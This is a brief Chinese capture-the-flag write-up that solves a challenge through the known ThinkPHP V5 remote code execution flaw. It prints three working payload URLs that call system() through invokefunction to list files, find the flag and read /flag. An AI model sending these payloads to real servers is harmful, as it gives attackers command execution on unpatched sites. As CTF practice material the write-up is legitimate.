已经给了开发框架了用的是ThinkPHP V5
所以我们直接搜这个框架爆出来的漏洞就好了
可以得到这里面有个远程rce
payload
url+/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=dir
然后我们就可以命令执行了
find / -name "flag"
payload
URL + /?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=find / -name "flag"
cat /flag
payload
URL + /?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=cat /flag
